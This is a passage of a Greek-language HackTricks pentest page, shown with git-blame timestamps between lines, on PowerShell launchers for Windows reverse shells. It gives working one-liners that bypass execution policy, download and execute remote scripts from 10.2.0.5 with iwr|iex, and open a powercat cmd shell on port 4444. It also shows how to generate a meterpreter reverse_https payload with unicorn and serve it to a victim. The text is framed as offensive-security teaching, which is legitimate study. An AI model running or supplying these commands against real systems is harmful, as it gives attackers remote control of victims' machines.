Δημιουργήστε έναν εκκινητή powershell, αποθηκεύστε τον σε ένα αρχείο και κατεβάστε και εκτελέστε τον.
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
2024-08-14 08:53:00 +00:00
**Ανιχνεύθηκε ως κακόβουλος κώδικας**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
### MSF-Unicorn
2020-07-15 15:43:14 +00:00
[https://github.com/trustedsec/unicorn ](https://github.com/trustedsec/unicorn )
2024-03-09 14:12:47 +00:00
Δημιουργήστε μια έκδοση powershell του backdoor του metasploit χρησιμοποιώντας το unicorn
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
```
2024-08-14 08:53:00 +00:00
Ξεκινήστε το msfconsole με τον δημιουργημένο πόρο:
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
msfconsole -r unicorn.rc
```
2024-08-14 08:53:00 +00:00
Ξεκινήστε έναν διακομιστή ιστού που σερβίρει το _powershell\_attack.txt_ αρχείο και εκτελέστε το στον θύμα:
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
```
2024-08-14 08:53:00 +00:00
**Ανιχνεύθηκε ως κακόβουλος κώδικας**
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
## Περισσότερα
2020-07-15 15:43:14 +00:00
2024-08-14 08:53:00 +00:00
[PS>Attack ](https://github.com/jaredhaight/PSAttack ) PS κονσόλα με μερικά επιθετικά PS modules προφορτωμένα (κρυπτογραφημένα)\
2022-10-27 23:22:18 +00:00
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9 ](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c )[\
2024-08-14 08:53:00 +00:00
WinPWN](https://github.com/SecureThisShit/WinPwn) PS κονσόλα με μερικά επιθετικά PS modules και ανίχνευση proxy (IEX)
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
## Αναφορές
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/ ](https://highon.coffee/blog/reverse-shell-cheat-sheet/ )
* [https://gist.github.com/Arno0x ](https://gist.github.com/Arno0x )
* [https://github.com/GreatSCT/GreatSCT ](https://github.com/GreatSCT/GreatSCT )
* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/ ](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/ )
* [https://www.hackingarticles.in/koadic-com-command-control-framework/ ](https://www.hackingarticles.in/koadic-com-command-control-framework/ )
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md )
2024-07-18 20:11:44 +00:00
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2024-08-14 08:53:00 +00:00
**Try Hard Security Group**
2024-03-15 00:12:21 +00:00
2024-07-18 20:11:44 +00:00
< figure > < img src = "/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-15 00:12:21 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
2024-07-18 20:11:44 +00:00
{% hint style="success" %}
2024-08-14 08:53:00 +00:00
Μάθετε & εξασκηθείτε στο AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Μάθετε & εξασκηθείτε στο GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-18 20:11:44 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-08-14 08:53:00 +00:00
< summary > Υποστήριξη HackTricks< / summary >
2023-12-30 20:49:23 +00:00
2024-07-18 20:11:44 +00:00
* Ελέγξτε τα [**σχέδια συνδρομής** ](https://github.com/sponsors/carlospolop )!
2024-08-14 08:53:00 +00:00
* **Εγγραφείτε στην** 💬 [**ομάδα Discord** ](https://discord.gg/hRep4RUj7f ) ή στην [**ομάδα telegram** ](https://t.me/peass ) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) και [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 20:11:44 +00:00
{% endhint %}